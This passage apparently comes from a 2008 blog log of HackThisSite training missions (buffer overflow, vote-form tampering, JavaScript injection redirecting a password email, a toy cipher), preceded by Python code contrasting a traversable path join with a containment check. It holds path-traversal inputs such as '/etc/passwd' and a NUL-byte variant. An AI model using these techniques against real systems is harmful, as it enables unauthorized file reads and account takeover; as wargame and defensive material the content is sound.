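PAGES_DIR = "/var/www/app/pages"


def vulnerable_path(filename: str) -> str:
    """Mirrors the PHP: concatenate and go. '../../index' walks out of PAGES_DIR."""
    return os.path.join(PAGES_DIR, filename + ".php")


def safe_path(filename: str, base: str = PAGES_DIR) -> str:
    """Resolve the candidate (symlinks and .. included) and refuse it unless the
    result is still inside base. Raises ValueError on traversal."""
    base_real = os.path.realpath(base)
    candidate = os.path.join(base_real, filename + ".php")
    target = os.path.realpath(candidate)
    # commonpath is the strongest containment test: "/var/www/app/pages2" is
    # NOT under "/var/www/app/pages", which a startswith() check would get wrong.
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError(f"path escapes {base}: {filename!r}")
    return target


def is_traversal(filename: str, base: str = PAGES_DIR) -> bool:
    """True when safe_path would reject the name."""
    try:
        safe_path(filename, base)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for name in ("about", "../../index", "/etc/passwd", "../pages2/x"):
        print(f"{name!r:16} vulnerable -> {vulnerable_path(name)}")
        print(f"{'':16} safe       -> {'REJECTED' if is_traversal(name) else safe_path(name)}")
```

Old PHP (before 5.3.4) also truncated paths at a NUL byte, so "../../etc/passwd%00" would drop the appended .php entirely; the resolve-then-check approach above is indifferent to that, because whatever the final path is, it must still sit under the base.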

Update to HTS

I couldn't do a few missions here in class due to it being on campus and the rules that apply there. So I decided to stop the Realistic simulations and move to the extended ones. The first one was rather easy. It was a simple buffer overflow. The achievement was to crash the program. They give you the script of a C program, and an input box to put what you would use to get the program to crash. Easy huh? Here's the given script:
void tuxownsyou(char *str) { char noob[60]; strcpy(noob, str); }
(I changed variables and numbers so not to violate their policy on copying in part/whole of their site)

Okay, in case some of you don't know how the buffer overflow works, it's quite simple. The array noob[60] sets aside 60 bytes (not bits) on the stack to hold the string passed in. strcpy copies until it reaches the terminating NUL and never checks the size of the destination, so there's nothing to stop a string longer than the buffer: 60 characters plus the NUL is already 61 bytes, and everything past the end of noob lands on whatever sits next on the stack, the saved frame pointer and the return address. Overwrite the return address with junk and the function returns to an address that doesn't exist, and the program crashes. In practice you feed it a few hundred characters rather than exactly 61, so the overwrite is certain to reach the return address. Was fun, but WWAAAYYYY too simple. Next stop, mission 2!

Also on a side note, this website grades your progress. I believe you start off as a "noob" then a "script kiddie". <--- Just hit apprentice. And <--- = noob. So if I can do it, _you_ _can_ _too_!

Monday, January 7, 2008

PHP Injection

Now, after finishing the 10 basic missions, I learned to use and abuse SSIs as well as do some JavaScript injections. Now on to the Realistic Missions. On the first mission the objective was to make a band go to the top of their ranking list. You are able to vote from 1-5 for the band. The top band had an average of 23 votes. So, to bring our target band to the top of the list, I used Firebug, a Firefox extension, changed the max rank in the form from 1-5 to 1-1000, and submitted my vote with my 1000 option. Doing this threw our band above and beyond all the other bands. And hurray!! We win! (The site's mistake: it trusted the limits of its own form instead of checking the vote range on the server.) There is another way to do this using PHP injection. But as with most things in IT, why do something the hard way when there is a tool that will make it easier... i.e. why do something a thousand times when you can make a script to do it for you? I would still like to learn about PHP injections, but I couldn't seem to get it to work correctly. Perhaps I will try it out some more in the future.

Cryptography

Just finished mission 6. This is the quote for the mission: "An encryption system has been set up, which uses an unknown algorithm to change the text given. Requirements: Persistence, some general cryptography knowledge." Basically I took their encrypted password, 78585ghj, and on their site there was an encrypting script that will encrypt whatever you put in for text, so I obviously started with a-z and 0-9 to see how the characters lined up. Then I realized that whatever the first input character was, it stays the same, and each character after that is shifted one further than the one before. So the first one is unchanged, the second is +1 in the alphabet/number, the third is +2, and so on. So, logically, to decrypt "7 8 5 8 5 g h j" you subtract each character's position:

position:   0 1 2 3 4 5 6 7
ciphertext: 7 8 5 8 5 g h j
plaintext:  7 7 3 5 1 b b c
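The cipher as worked out above, plus the chosen-plaintext trick that found it, in Python. This is an added example and not code from the mission or the site. The mission never shows a character wrapping past 'z' or '9', so the wrap-around inside each class (digits with digits, letters with letters) is an assumption of mine; the function names are mine too. The analysis half goes a little beyond the post: recover_shifts() measures the shift at every position from one probe string, so it works for any position-dependent shift, not only the +0, +1, +2... pattern seen here.

```python
import string

DIGITS = string.digits            # "0123456789"
LOWER = string.ascii_lowercase    # "abcdefghijklmnopqrstuvwxyz"


def _shift(ch: str, k: int) -> str:
    """Shift one character by k inside its own class. Assumption: digits wrap
    within 0-9 and letters within a-z; anything else passes through unchanged."""
    for alphabet in (DIGITS, LOWER):
        if ch in alphabet:
            return alphabet[(alphabet.index(ch) + k) % len(alphabet)]
    return ch


def encrypt(plain: str) -> str:
    """Position i is shifted by +i: first char unchanged, second +1, third +2..."""
    return "".join(_shift(ch, i) for i, ch in enumerate(plain))


def decrypt(cipher: str) -> str:
    """Undo it: position i is shifted by -i."""
    return "".join(_shift(ch, -i) for i, ch in enumerate(cipher))


def recover_shifts(encrypt_oracle, length: int) -> list:
    """Chosen-plaintext analysis, which is what the site's encrypt box gives you:
    feed a run of identical letters and read off how far each position moved."""
    out = encrypt_oracle("a" * length)
    return [(LOWER.index(c) - LOWER.index("a")) % len(LOWER) for c in out]


def decrypt_with_shifts(cipher: str, shifts: list) -> str:
    """Decrypt using per-position shifts measured by recover_shifts()."""
    return "".join(_shift(ch, -k) for ch, k in zip(cipher, shifts))


if __name__ == "__main__":
    target = "78585ghj"
    shifts = recover_shifts(encrypt, len(target))
    print("measured shifts:", shifts)
    print("password:", decrypt_with_shifts(target, shifts))
```

Two probes are all it takes against a scheme like this: one run of letters to get the shifts, one run of digits to confirm digits are handled the same way. Any "unknown algorithm" you can query with inputs of your choosing is a chosen-plaintext target, which is the general cryptography knowledge the mission hints at.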

Javascript Injection!!!

Well, I spent the last 15 minutes attempting to finish mission 5. The point of the mission was that an administrator set up a script to email himself a password for the site in the event he forgot it. It was to be sent to his email: webmaster@hulla-balloo.com. Using a JavaScript injection I was able to change the address the password gets mailed to to my own, thus giving me the password when I hit 'Send password to Sam'. Poor, poor Sam. Never knew what hit him :/ So this was a fun one. I learned something new and somewhat useful. I also learned: never put a script to email yourself a password in the event you're too lame to remember it ;)

Hackthissite

I decided to take a crack at HackThisSite and begin the hacker bootcamp. After about 5 minutes I've finished the first 4 missions. The first 3 were extremely simple. But I am sure they will become more difficult as I go on. So far I've learned some people just don't think before they write a website ;)

Friday, January 4, 2008

The Beginning

Got a textbook from AC. I plan on reading some of it today, and slapping some information on here of what I learned.